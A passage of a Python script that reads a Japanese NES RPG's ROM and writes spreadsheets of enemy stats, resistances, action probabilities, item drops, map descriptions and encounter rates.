0x09: \"1の巻\", # フライングバム\n 0x0A: \"1の巻\", # スカルバット\n 0x0B: \"1の巻\", # ダイキチ\n 0x0C: \"1の巻\", # へルラッツ\n 0x0D: \"1の巻\", # アッカンべー\n 0x0E: \"1の巻\", # へらへら\n 0x0F: \"1の巻\", # クモジン\n 0x10: \"1の巻\", # からくりマン\n 0x11: \"1の巻\", # ブラックマン\n 0x12: \"1の巻\", # かげにん\n 0x13: \"1の巻\", # にんけん\n 
0x14: \"ボス\", # デビルクローン\n 0x15: \"2の巻\", # べムガー\n 0x16: \"2の巻\", # デスグりーン\n 0x17: \"2の巻\", # へルモンキー\n 0x18: \"2の巻\", # シェルビー\n 0x19: \"2の巻\", # へびおんな\n 0x1A: \"2の巻\", # ドラゴンマン\n 0x1B: \"2の巻\", # ぎょろん\n 0x1C: \"2の巻\", # メカタツノコ\n 0x1D: \"ボス\", # タツノコつかい\n 0x1E: \"ボス\", # うつぼうず\n 0x1F: \"3の巻\", # おおとげむし\n 0x20: \"3の巻\", # マグマンゼりー\n 0x21: \"3の巻\", # ひふきガメ\n 0x22: \"3の巻\", # べロべロべー\n 0x23: \"3の巻\", # ヒダシメ\n 0x24: \"3の巻\", # バットクルス\n 0x25: \"3の巻\", # かえんマン\n 0x26: \"3の巻\", # いんねび\n 0x27: \"ボス\", # かえんだいおう\n 0x28: \"4の巻\", # マッドボアー\n 0x29: \"4の巻\", # ひゃっかんいぬ\n 0x2A: \"4の巻\", # ウルフマン\n 0x2B: \"4の巻\", # りトルエイプ\n 0x2C: \"4の巻\", # しろやまた\n 0x2D: \"4の巻\", # へルバット\n 0x2E: \"4の巻\", # くらやみマン\n 0x2F: \"4の巻\", # シャドウマン\n 0x30: \"ボス\", # ムササビだゆう\n 0x31: \"5の巻\", # あまのじゃく\n 0x32: \"5の巻\", # クレイジーカウ\n 0x33: \"5の巻\", # レッドソーサー\n 0x34: \"5の巻\", # しにがみこぞう\n 0x35: \"5の巻\", # にんげんもどき\n 0x36: \"5の巻\", # バトルナイト\n 0x37: \"ボス\", # コウモりだゆう\n 0x38: \"6の巻\", # ララバイかめん\n 0x39: \"6の巻\", # スーパークロン\n 0x3A: \"6の巻\", # シャーぺイン\n 0x3B: \"6の巻\", # サソラム\n 0x3C: \"6の巻\", # コカーメン\n 0x3D: \"6の巻\", # カーメン\n 0x3E: \"6の巻\", # きがマン\n 0x3F: \"ボス\", # ビッグカンカン\n 0x40: \"6の巻\", # マッドミイラ\n 0x41: \"6の巻\", # ファラー\n 0x42: \"6の巻\", # スフインツク\n 0x43: \"ボス\", # ツタンだいおう\n 0x44: \"7の巻\", # パニュロン\n 0x45: \"7の巻\", # ガオウ\n 0x46: \"7の巻\", # アイスマン\n 0x47: \"7の巻\", # ひょうがんだん\n 0x48: \"7の巻\", # ガンテツゾンビ\n 0x49: \"7の巻\", # ゆきひめ\n 0x4A: \"7の巻\", # ダークへッド\n 0x4B: \"7の巻\", # ひょうけつマン\n 0x4C: \"7の巻\", # ひょうがコング\n 0x4D: \"ボス\", # だるまだいし\n 0x4E: \"8の巻\", # へルファイヤー\n 0x4F: \"8の巻\", # どろたぼう\n 0x50: \"8の巻\", # ゾンビー\n 0x51: \"8の巻\", # のろいひめ\n 0x52: \"8の巻\", # ゾンビコウモり\n 0x53: \"8の巻\", # メタルパラソル\n 0x54: \"8の巻\", # あしがるゾンビ\n 0x55: \"8の巻\", # のろいマン\n 0x56: \"8の巻\", # スカルホッパー\n 0x57: \"8の巻\", # ミステりーアイ\n 0x58: \"ボス\", # ゾンビまおう\n 0x59: \"8の巻\", # かねくいだま\n 0x5A: \"8の巻\", # ラーゴン\n 0x5B: \"8の巻\", # モスカルラ\n 0x5C: \"8の巻\", # ダンダン\n 0x5D: \"8の巻\", # キンゾー\n 0x5E: \"8の巻\", # ガキゾンビ\n 0x5F: \"8の巻\", # ブレインソーサ\n 0x60: \"ボス\", # ロボゴールド\n 0x61: \"1の巻\", # キノコング\n 0x63: \"9の巻\", # あかぼうず\n 0x64: \"9の巻\", # ダークネス\n 0x65: \"9の巻\", # まぼろしかめん\n 0x66: \"9の巻\", # ろくろ\n 0x67: \"9の巻\", # まそうりょ\n 0x68: \"9の巻\", # はんにゃ\n 0x69: \"9の巻\", # ドラゴルド\n 0x6A: \"ボス\", # バイオフラワー\n 0x6B: \"9の巻\", # マンイーター\n 0x6C: \"9の巻\", # フラワー\n 0x6D: \"10の巻\", # みらいマン\n 0x6E: \"10の巻\", # ジョックー\n 0x6F: \"10の巻\", # ミンミン\n 0x70: \"10の巻\", # アイアンアイ\n 0x71: \"10の巻\", # ガンダーロボ\n 0x72: \"10の巻\", # レイザータンク\n 0x73: \"ボス\", # ボスガンダー1\n 0x74: \"ボス\", # ボスガンダー2\n 0x75: \"10の巻\", # メガべルガー\n 0x76: \"10の巻\", # レガルゴ\n 0x77: \"10の巻\", # スカイキラー\n 0x78: \"ボス\", # エイりアンドー\n 0x79: \"ボス\", # キラーウルフ\n 0x7A: \"ボス\", # メタルブロック\n 0x7B: \"ボス\", # フライウイドウ\n 0x7C: \"ボス\", # サーべンラガー\n 0x7D: \"ボス\", # マインマスター\n 0x7E: \"オニガランド\", # クレイジーババ\n 0x7F: \"オニガランド\", # まへいもち\n 0x80: \"オニガランド\", # ドグウアーマー\n 0x81: \"オニガランド\", # へビオトコ\n 0x82: \"ボス\", # イヌゾンビ\n 0x83: \"オニガランド\", # あおぼうず\n 0x84: \"オニガランド\", # オニデーモン\n 0x85: \"オニガランド\", # マグマン\n 0x86: \"オニガランド\", # モンスタージジ\n 0x87: \"オニガランド\", # あおきし\n 0x88: \"オニガランド\", # オニタコン\n 0x89: \"ボス\", # サルボス\n 0x8A: \"オニガランド\", # シーサーぺント\n 0x8B: \"オニガランド\", # ブルーアンクル\n 0x8C: \"オニガランド\", # スネークポッド\n 0x8D: \"オニガランド\", # レッドドッグ\n 0x8E: \"オニガランド\", # ブルードッグ\n 0x8F: \"オニガランド\", # バンコパ\n 0x90: \"オニガランド\", # ピーチボーイズ\n 0x91: \"ボス\", # モモタロゾンビ\n 0x92: \"ボス\", # キラーウルフ\n 0x93: \"オーロラ王国\", # グりーンアイ\n 0x94: \"オーロラ王国\", # つるりん\n 0x95: \"オーロラ王国\", # へビーガル\n 0x96: \"オーロラ王国\", # スカイマン\n 0x97: \"オーロラ王国\", # クレバス\n 0x98: \"オーロラ王国\", # グりーンケルプ\n 0x99: \"オーロラ王国\", # イノクラッシュ\n 0x9A: \"オーロラ王国\", # アイスファイヤ\n 0x9B: \"オーロラ王国\", # べムカッター\n 0x9C: 
\"オーロラ王国\", # がいこつむし\n 0x9D: \"オーロラ王国\", # シャドーマスク\n 0x9E: \"オーロラ王国\", # カニモンス\n 0x9F: \"オーロラ王国\", # アイスストーン\n 0xA0: \"オーロラ王国\", # ゆきみアイス\n 0xA1: \"オーロラ王国\", # ブルーザウルス\n 0xA2: \"オーロラ王国\", # じんめんいわ\n 0xA3: \"オーロラ王国\", # エレキラドン\n 0xA4: \"オーロラ王国\", # ブビ\n 0xA5: \"オーロラ王国\", # キルスライダー\n 0xA6: \"ボス\", # メタルブロック\n 0xA9: \"2の巻\", # しきゃくマン\n 0xAA: \"ボス\", # キンタロゾンビ\n 0xAC: \"ボス\", # ウシまつ\n }.get(enemy_id, \"不明\")\n\n\ndef _fill_enemy(prg_rom_bytes: bytes, worksheet: openpyxl.worksheet.worksheet.Worksheet) -> None:\n row_index = 1\n header_row = [\n _ColumnStyle(caption=\"敵ID\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"敵名前\"),\n _ColumnStyle(caption=\"初出\"),\n _ColumnStyle(caption=\"基礎命\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"最小命\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"最大命\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"超力\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"攻撃\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"防御\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"スピード\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"経験値\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"獲得金\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"逃走\"),\n _ColumnStyle(caption=\"行動回数\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"回避補正\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"ミハギトきく率\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"クルスきく率\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"ベトきく率\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"地震系超力きく率\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"火炎系超力きく率\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"水撃系・氷結系超力きく率\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"電撃系超力きく率\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"爆発系超力きく率\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"マフウジきく率\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"マフウジ有効ターン数\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"ララバイきく率\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"ララバイ有効ターン数\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"パラパきく率\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"パラパ有効ターン数\", cell_alignment=_RIGHT_ALIGNMENT),\n ]\n for i in range(_MAX_ACTIONS_PER_ENEMY):\n header_row.append(_ColumnStyle(caption=f\"敵行動{i + 1}\"))\n header_row.append(_ColumnStyle(caption=f\"敵行動{i + 1}_確率\", cell_alignment=_RIGHT_ALIGNMENT))\n header_row.append(_ColumnStyle(caption=\"ドロップアイテム1\"))\n header_row.append(_ColumnStyle(caption=\"ドロップアイテム2\"))\n header_row.append(_ColumnStyle(caption=\"ドロップアイテム確率\", cell_alignment=_RIGHT_ALIGNMENT))\n header_row.append(_ColumnStyle(caption=\"備考\"))\n _fill_worksheet_header_row(worksheet, row_index, header_row)\n worksheet.freeze_panes = \"C2\"\n choriki_endurance = {\n 0: \"100%\",\n 1: \"70%\",\n 2: \"30%\",\n 3: \"0%\",\n }\n debuff_endurance = {\n 0: \"100%\",\n 1: \"70%\",\n 2: \"30%\",\n 3: \"0%\",\n }\n tern_bucket = {\n 0: \"2 or 3\",\n 1: \"4 or 5\",\n 2: \"5 or 6\",\n }\n escapable = {\n True: \"可能\",\n False: \"不可\",\n }\n attack_twice = {\n True: \"1 or 2\",\n False: \"1\",\n }\n hittability = {\n 0: 0xC0,\n 1: 0xA0,\n 2: 0x80,\n 3: 0,\n }\n mihagito_endurance = {\n True: \"0%\",\n False: \"40%\",\n }\n kurusu_endurance = {\n True: \"0%\",\n False: \"20%\",\n }\n beto_endurance = {\n True: 
\"0%\",\n False: \"40%\",\n }\n note_by_enemy_id = {\n 0x78: \"プレイヤーの行動選択後のターン開始時に命の上位バイトが#$7Fに上書きされる。(ターン開始時に命が32513(#$7F01)以上に回復する)\", # エイりアンドー\n }\n rows = []\n for enemy_id in range(1, _ENEMY_ID_COUNT + 1):\n enemy = _get_enemy(prg_rom_bytes, enemy_id)\n enemy_name = _get_enemy_name(prg_rom_bytes, enemy_id)\n mahuuji_endurance = debuff_endurance[enemy.mahuuji_endurance]\n if enemy.mahuuji_endurance == 3:\n assert enemy.mahuuji_effectiveness == 0\n mahuuji_tern_count = \"-\"\n else:\n mahuuji_tern_count = tern_bucket[enemy.mahuuji_effectiveness]\n lullaby_endurance = debuff_endurance[enemy.lullaby_endurance]\n if enemy.lullaby_endurance == 3:\n assert enemy.lullaby_effectiveness == 0\n lullaby_tern_count = \"-\"\n else:\n lullaby_tern_count = tern_bucket[enemy.lullaby_effectiveness]\n parapa_endurance = debuff_endurance[enemy.parapa_endurance]\n if enemy.parapa_endurance == 3:\n assert enemy.parapa_effectiveness == 0\n parapa_tern_count = \"-\"\n else:\n parapa_tern_count = tern_bucket[enemy.parapa_effectiveness]\n row = [\n enemy_id,\n enemy_name.enemy_name.strip(),\n _get_chapter_name_of_enemy(enemy_id),\n enemy.hp,\n enemy.min_hp,\n enemy.max_hp,\n enemy.cp,\n enemy.attack,\n enemy.defense,\n enemy.speed,\n enemy.money,\n enemy.experience,\n escapable[enemy.escapable],\n attack_twice[enemy.attack_twice],\n hittability[enemy.hittability],\n mihagito_endurance[enemy.mihagito_endurance],\n kurusu_endurance[enemy.kurusu_endurance],\n beto_endurance[enemy.beto_endurance],\n choriki_endurance[enemy.choriki_endurance_1],\n choriki_endurance[enemy.choriki_endurance_2],\n choriki_endurance[enemy.choriki_endurance_3_4],\n choriki_endurance[enemy.choriki_endurance_5],\n choriki_endurance[enemy.choriki_endurance_6],\n mahuuji_endurance,\n mahuuji_tern_count,\n lullaby_endurance,\n lullaby_tern_count,\n parapa_endurance,\n parapa_tern_count,\n ]\n enemy_action_pattern = _get_enemy_action_pattern(prg_rom_bytes, enemy.action_pattern_id)\n action_threshold_by_action_id = _aggregate_enemy_action_pattern(enemy_action_pattern)\n sorted_actions = sorted(action_threshold_by_action_id.items(), key=operator.itemgetter(1), reverse=True)\n for i in range(_MAX_ACTIONS_PER_ENEMY):\n if i < len(sorted_actions):\n (action_id, threshold) = sorted_actions[i]\n action_name = _get_action_name(prg_rom_bytes, action_id).action_name.strip()\n row.append(action_name)\n row.append(f\"{round(threshold / (0x100 * 2) * 100, 2):.02f}% ({threshold} / {0x100 * 2})\")\n else:\n row.append(\"-\")\n row.append(\"-\")\n item_drop_pattern = _get_item_drop_pattern(prg_rom_bytes, enemy.item_drop_pattern_id)\n has_drop_item = False\n if item_drop_pattern.drop_item_id_0 == 0:\n row.append(\"-\")\n else:\n has_drop_item = True\n row.append(_get_item_name(prg_rom_bytes, item_drop_pattern.drop_item_id_0).item_name.strip())\n if item_drop_pattern.drop_item_id_1 == 0:\n assert not has_drop_item\n row.append(\"-\")\n else:\n assert has_drop_item\n has_drop_item = True\n row.append(_get_item_name(prg_rom_bytes, item_drop_pattern.drop_item_id_1).item_name.strip())\n if not has_drop_item:\n row.append(\"-\")\n elif item_drop_pattern.item_drop_threshold == 0:\n row.append(\"100.00%\")\n else:\n row.append(f\"{round(item_drop_pattern.item_drop_threshold / 0x100 * 100, 2):.02f}% ({item_drop_pattern.item_drop_threshold} / {0x100})\")\n row.append(note_by_enemy_id.get(enemy_id, \"-\"))\n rows.append(row)\n\n def _get_sort_key(row: List[Any]) -> Tuple[int, int]:\n enemy_id = row[0]\n enemy_chapter_priority = [\n \"1の巻\",\n \"2の巻\",\n \"3の巻\",\n 
\"4の巻\",\n \"5の巻\",\n \"6の巻\",\n \"7の巻\",\n \"8の巻\",\n \"9の巻\",\n \"10の巻\",\n \"オニガランド\",\n \"オーロラ王国\",\n \"ボス\",\n \"不明\",\n ].index(row[2])\n return (enemy_chapter_priority, enemy_id)\n\n for row in sorted(rows, key=_get_sort_key):\n row_index += 1\n _fill_worksheet_row(worksheet, row_index, header_row, row)\n\n\ndef _get_encounter_threshold(prg_rom_bytes: bytes, encounter_threshold_id: int) -> int:\n assert 0 <= encounter_threshold_id <= 7\n if encounter_threshold_id == 0:\n return 0\n return prg_rom_bytes[0x00FD7D + (encounter_threshold_id - 1)]\n\n\ndef _fill_map(prg_rom_bytes: bytes, worksheet: openpyxl.worksheet.worksheet.Worksheet) -> None:\n description_by_map_id = {\n 0x0000: \"ワールドマップ\",\n 0x0001: \"オニガランドワールドマップ\",\n 0x0002: \"オーロラ王国ワールドマップ\",\n 0x0004: \"柳生の里\",\n 0x0008: \"尾張の町:奉行所1階\",\n 0x0009: \"尾張の町:奉行所地下牢\",\n 0x0025: \"アザラシ村とゆきおとこ村の間の洞窟\",\n 0x0026: \"オーロラ村とアザラシ村の間の洞窟2\",\n 0x0028: \"浪速の都:越後屋への地下通路(左から右)\",\n 0x002A: \"なまず大明神:入り口の社\",\n 0x002B: \"なまず大明神:おおなまずのフロア\",\n 0x002C: \"からくり城:1階\",\n 0x002E: \"からくり城:地下1階牢屋\",\n 0x0030: \"柳生の里(江戸の町崩壊後)\",\n 0x0031: \"からくり城:入り口の細い通路\",\n 0x0035: \"柳生の里:但馬邸(江戸の町崩壊後)\",\n 0x003A: \"シードラゴン:縦に長い階段があるフロア\",\n 0x003B: \"シードラゴン:最下層(水の流れているフロア)\",\n 0x003C: \"シードラゴン:一番上の層の右の部屋・3番目の層の右の部屋(何も無い部屋)\",\n 0x003D: \"シードラゴン:乙姫の前の人が7人いる部屋\",\n 0x003E: \"シードラゴン:たつのこつかいのフロアの1つ前の宝箱が6個ある部屋\",\n 0x003F: \"シードラゴン:うつぼうずのフロア\",\n 0x0040: \"龍宮からシードラゴンへの通路1\",\n 0x0041: \"シードラゴン:入ってすぐのフロア\",\n 0x0042: \"シードラゴン:最下層からうつぼうずの途中の部屋1\",\n 0x0043: \"龍宮\",\n 0x0044: \"シードラゴン:たつのこつかいのいる部屋\",\n 0x0045: \"シードラゴン:一番上の層の左の部屋・2番目の層の左の部屋(たるが2個ある部屋)\",\n 0x0047: \"シードラゴン:2番目の層の真ん中の部屋・3番目の層の左の部屋(たるが5個ある部屋)\",\n 0x0048: \"シードラゴン:2番目の層の右の部屋(うつぼのカギがある部屋)\",\n 0x004A: \"龍宮からシードラゴンへの通路2\",\n 0x004C: \"シードラゴン:最下層からうつぼうずの途中の部屋2\",\n 0x004D: \"シードラゴン:最下層からうつぼうずの途中の部屋3\",\n 0x004E: \"シードラゴン:最下層からうつぼうずの途中の部屋4\",\n 0x004F: \"シードラゴン:最下層からうつぼうずの途中の部屋5\",\n 0x0050: \"火炎城:フロア1(火炎城最初のフロア)\",\n 0x0051: \"暗闇城:地下4階(こうもりだゆうのフロア)\",\n 0x0053: \"龍の祠(さばのすけで龍宮の入り口を見つけるフロア)\",\n 0x0054: \"のろい城:2階\",\n 0x0056: \"火炎城:フロア2\",\n 0x0058: \"火炎城:フロア3\",\n 0x0059: \"火炎城:フロア4(横1列のフロア)\",\n 0x005A: \"氷結城:左の塔4階\",\n 0x005B: \"氷結城:右の塔4階\",\n 0x005C: \"イワンのだっしゅつ\",\n 0x005D: \"龍宮への入り口の次の真っ黒のフロア(じゅうべえ落下)\",\n 0x005F: \"シードラゴン:乙姫の部屋\",\n 0x0060: \"火炎城:フロア5\",\n 0x0061: \"暗闇城:地下1階(入ってすぐのフロア)\",\n 0x0062: \"暗闇城:地下2階\",\n 0x0063: \"暗闇城:地下3階(牢屋)\",\n 0x0064: \"暗闇城:地下2階(ヘルバットのフロア)\",\n 0x0065: \"浪速の都(からくり城攻略前の暗い状態)\",\n 0x0067: \"浪速の都:越後屋からからくり城への地下通路(下から上)\",\n 0x0068: \"飢餓城:1階\",\n 0x006B: \"浪速の都:���後屋\",\n 0x006E: \"飢餓城:2階\",\n 0x006F: \"飢餓城:3階(スフインツクのフロア)\",\n 0x0070: \"飢餓城:地下1階\",\n 0x0071: \"飢餓城:3階\",\n 0x0072: \"飢餓城:3階(ビッグカンカンからスフインツクの間の通路)\",\n 0x0073: \"飢餓城:4階(ツタンだいおうのフロア)\",\n 0x0074: \"飢餓城:ビッグカンカンのフロア\",\n 0x0076: \"氷結城:左の塔2階\",\n 0x0077: \"氷結城:左の塔3階\",\n 0x007B: \"氷結城:5階(メガトンコインを持っていると落ちてしまうところ)\",\n 0x007C: \"氷結城:だるまたいしのいるフロア\",\n 0x007D: \"氷結城:右の塔1階\",\n 0x007E: \"氷結城:右の塔3階\",\n 0x0083: \"かぶとがに大明神:入り口の社\",\n 0x0084: \"かぶとがに大明神:内部\",\n 0x0085: \"安芸の町\",\n 0x0086: \"伊予の町\",\n 0x0088: \"伊予の町から土佐の町への地下道\",\n 0x0089: \"宇宙(タコリアンのUFOでの移動画面)\",\n 0x008A: \"つちのこ大明神\",\n 0x008B: \"土佐の町(シードラゴン攻略前)\",\n 0x008D: \"のろい城:地下1階\",\n 0x008E: \"のろい城:1階(入ってすぐのフロア)\",\n 0x008F: \"のろい城:1階\",\n 0x0090: \"のろい城:3階(棺桶が多いフロア)・4階\",\n 0x0091: \"のろい城:5階(ゾンビまおうのフロア)\",\n 0x0092: \"のろい城:3階(牢屋のあるフロア)\",\n 0x0094: \"のろい城:ゾンビマシン\",\n 0x0097: \"岬の小屋(さばのすけのいるフロア)\",\n 0x0098: \"呉別府の渡し\",\n 0x0099: \"異人の町\",\n 0x009A: \"隼人の渡し\",\n 0x00A2: \"モンゴレンの町:あおいほんがあるフロア\",\n 0x00A5: \"オーロラ村とアザラシ村の間の洞窟1\",\n 0x00A6: \"黄金洞窟\",\n 0x00A8: 
\"ゆきおとこ村北のガンちゃんで岩を退けるフロア\",\n 0x00A9: \"浪速の都:越後屋の隠し通路部屋\",\n 0x00AC: \"未来城:左の塔上層1階\",\n 0x00AD: \"未来城:右の塔上層(最下層へ落下させられるフロア)\",\n 0x00AF: \"隠れ湯\",\n 0x00B0: \"富士山への地下通路\",\n 0x00B8: \"未来城:パームロケットが貰える部屋\",\n 0x00BD: \"ミロクの洞窟\",\n 0x00BE: \"未来城:外観(入ってすぐのフロア)\",\n 0x00C0: \"未来城:格納庫(床下パネルを調べながら進むフロアの途中にある上下に入り口のある部屋)\",\n 0x00C4: \"未来城:左の塔下層(左の塔入ってすぐのフロア)\",\n 0x00C5: \"未来城:左の塔最上階(ボスガンダー1のフロア)\",\n 0x00C9: \"未来城:中央の橋(パームロケットを使うフロア)\",\n 0x00CA: \"未来城:右の塔(上層から最下層への落下画面)\",\n 0x00CB: \"未来城:右の塔最下層(ボスガンダー2のフロア)\",\n 0x00CF: \"未来城:格納庫(ドールのカギを使い入ってすぐのフロア)\",\n 0x00D6: \"未来城:格納庫(床下パネルを調べながら進むフロア)\",\n 0x00DC: \"未来城:中央の塔(マインマスターのフロア)\",\n 0x00E0: \"未来城:中央の塔(マインマスターのフロアのひとつ前のフロア)\",\n 0x00E1: \"モモタロゾンビの城1階\",\n 0x00E2: \"モモタロゾンビの城2階\",\n 0x00E3: \"モモタロゾンビの城3階\",\n 0x00E5: \"オーロラ村:王宮\",\n 0x00E6: \"未来城:左の塔上層2階\",\n 0x00E7: \"未来城:左の塔上層3階\",\n 0x00E8: \"未来城:左の塔上層4階\",\n 0x00E9: \"未来城:左の塔上層5階\",\n 0x00EA: \"未来城:右の塔最上階\",\n 0x00EB: \"未来城:右の塔最上階-1階\",\n 0x00EC: \"ゆきおとこ村からクーラーの洞窟の間の洞窟\",\n 0x00ED: \"ゆきおとこ村\",\n 0x00EE: \"北の洞窟:入ってすぐのフロア\",\n 0x00EF: \"北の洞窟:2番目のフロア\",\n 0x00F0: \"オーロラ村\",\n 0x00F1: \"モモタロゾンビの城4階\",\n 0x00F2: \"モモタロゾンビの城5階\",\n 0x00F3: \"クーラーの洞窟:入ってすぐのフロア\",\n 0x00F4: \"クーラーの洞窟:メタルブロックのいるフロア\",\n 0x00F5: \"隠れ湯:みかづきの部屋\",\n 0x00F6: \"薩摩の町(火炎城攻略前)\",\n 0x00F7: \"薩摩の町(かえんだいおう戦後)\",\n 0x00F8: \"薩摩の町(かえんだいおう潜伏時)\",\n 0x00FC: \"安芸の町:かごちゃんの部屋\",\n 0x00FD: \"琉球の村\",\n 0x00FE: \"琉球の村から火炎城への地下道\",\n 0x0100: \"屋久島\",\n 0x0101: \"屋久島:杉の子大明神\",\n 0x0102: \"壱岐(天狗のいるフロ���)\",\n 0x0103: \"オロ島(シロのいるフロア)\",\n 0x0104: \"門司の村\",\n 0x0105: \"門司の村:鬼の涙を使う穴がある部屋\",\n 0x0106: \"門司の村:鬼の涙を使うフロア\",\n 0x0107: \"下関の村\",\n 0x010A: \"黄泉の洞窟:入ってすぐのフロア\",\n 0x010C: \"黄泉の洞窟:エイリアンドール跡地\",\n 0x010D: \"カムカムの渡し\",\n 0x010E: \"黄泉の洞窟:タコリアンのいるフロア\",\n 0x010F: \"プーサンの村\",\n 0x0110: \"暗闇城から黄泉の洞窟への地下通路\",\n 0x0111: \"異星の廃都\",\n 0x0112: \"長門の村\",\n 0x0113: \"コンコンの町\",\n 0x0116: \"ホルクロア:まがつたまがあるフロア\",\n 0x0117: \"白ウサギ大明神\",\n 0x0118: \"ジャンパイの町\",\n 0x011A: \"ポキン\",\n 0x011C: \"クーロン城:入ってすぐのフロア\",\n 0x011D: \"クーロン城:地下牢\",\n 0x011E: \"クーロン城:コスモトロンがあるフロア\",\n 0x011F: \"ソウレンの村\",\n 0x0121: \"シーサンプータ\",\n 0x0122: \"三里の長城\",\n 0x0123: \"モンゴレンの町\",\n 0x0125: \"ハルビンタの村\",\n 0x0127: \"からくり城(ワールドマップから入った場合;入り口が無い)\",\n 0x0128: \"コウモリ洞窟(しんかげがあるフロア)\",\n 0x012A: \"ウラジョスト\",\n 0x012C: \"ババロフの町\",\n 0x012D: \"青い石碑(ノルンのなみだを使うフロア)\",\n 0x012E: \"最果ての洞窟(イワンの埋まっているフロア)\",\n 0x012F: \"石狩の町\",\n 0x0130: \"北の神々の祠\",\n 0x0131: \"まりもの里\",\n 0x0133: \"函館の村\",\n 0x0134: \"りんご村\",\n 0x0135: \"イタコ村\",\n 0x0137: \"十和田の石碑\",\n 0x0138: \"なんぶの町\",\n 0x013C: \"氷結城:入り口\",\n 0x013D: \"のろい城:入り口\",\n 0x013E: \"あきんどタウン\",\n 0x013F: \"ミミズク大明神\",\n 0x0140: \"いけない渡し\",\n 0x0142: \"あわの村\",\n 0x0143: \"江戸の町\",\n 0x0146: \"エンディング:マインマスター戦後のフロア\",\n 0x0147: \"シバレンの村\",\n 0x0148: \"のろい城:5階からゾンビマシンの間の移動\",\n 0x014D: \"千里の長城\",\n 0x014E: \"富士山\",\n 0x014F: \"ホルクロア\",\n 0x0150: \"薩摩の町の右下の火山\",\n 0x0152: \"しろくま村\",\n 0x0156: \"アザラシ村\",\n 0x0158: \"シロ編エンディングのスギ\",\n 0x0159: \"北の洞窟:ガンちゃんがいるフロア\",\n 0x015A: \"ミミナリ島の祠1階\",\n 0x015B: \"ミミナリ島の祠2階(キンタロゾンビのフロア)\",\n 0x015C: \"トンカチ島の祠(チューリップ)\",\n 0x015D: \"トンカチ島の祠(チューリップで転送後)\",\n }\n row_index = 1\n header_row = [\n _ColumnStyle(caption=\"マップID\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"マップ説明\"),\n _ColumnStyle(caption=\"敵グループパターンリストID\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"敵エンカウント確率\", cell_alignment=_RIGHT_ALIGNMENT),\n ]\n _fill_worksheet_header_row(worksheet, row_index, header_row)\n worksheet.freeze_panes = \"B2\"\n for map_id in range(0, _MAP_ID_COUNT):\n map_data = _get_map(prg_rom_bytes, map_id)\n if 
map_id in (0x00, 0x01, 0x02):\n # 0x00: ワールドマップ\n # 0x01: オニガランドワールドマップ\n # 0x02: オーロラ王国ワールドマップ\n encounter_rate = \"移動先のマスの種類により変わる\"\n else:\n encounter_threshold = _get_encounter_threshold(prg_rom_bytes, map_data.encounter_threshold_id)\n encounter_rate = f\"{round(encounter_threshold / 0x100 * 100, 2):.02f}% ({encounter_threshold} / {0x100})\"\n row = [map_id, description_by_map_id.get(map_id, \"\"), map_data.enemy_group_pattern_list_id, encounter_rate]\n row_index += 1\n _fill_worksheet_row(worksheet, row_index, header_row, row)\n\n\ndef _aggregate_enemy_action_pattern_ids(enemy_group_pattern_ids: Sequence[int]) -> Sequence[Tuple[int, int]]:\n return tuple((enemy_group_pattern_id, len(tuple(ids))) for enemy_group_pattern_id, ids in itertools.groupby(sorted(enemy_group_pattern_ids)))\n\n\ndef _fill_enemy_group_pattern_list(prg_rom_bytes: bytes, worksheet: openpyxl.worksheet.worksheet.Worksheet) -> None:\n row_index = 1\n header_row = [\n _ColumnStyle(caption=\"敵グループパターンリストID\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"敵グループパターンID\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"敵グループパターンリスト内確率\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"敵合計数\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"グループ数\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"グループ1敵名前\"),\n _ColumnStyle(caption=\"グループ1敵数\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"グループ2敵名前\"),\n _ColumnStyle(caption=\"グループ2敵数\", cell_alignment=_RIGHT_ALIGNMENT),\n _ColumnStyle(caption=\"グループ3敵名前\"),\n _ColumnStyle(caption=\"グループ3敵数\", cell_alignment=_RIGHT_ALIGNMENT),\n ]\n _fill_worksheet_header_row(worksheet, row_index, header_row)\n worksheet.freeze_panes = \"B2\"\n for enemy_group_pattern_list_id in range(0, _ENEMY_GROUP_PATTERN_LIST_ID_COUNT):\n enemy_group_pattern_list = _get_enemy_group_pattern_list(prg_rom_bytes, enemy_group_pattern_list_id)\n enemy_group_pattern_ids_count = 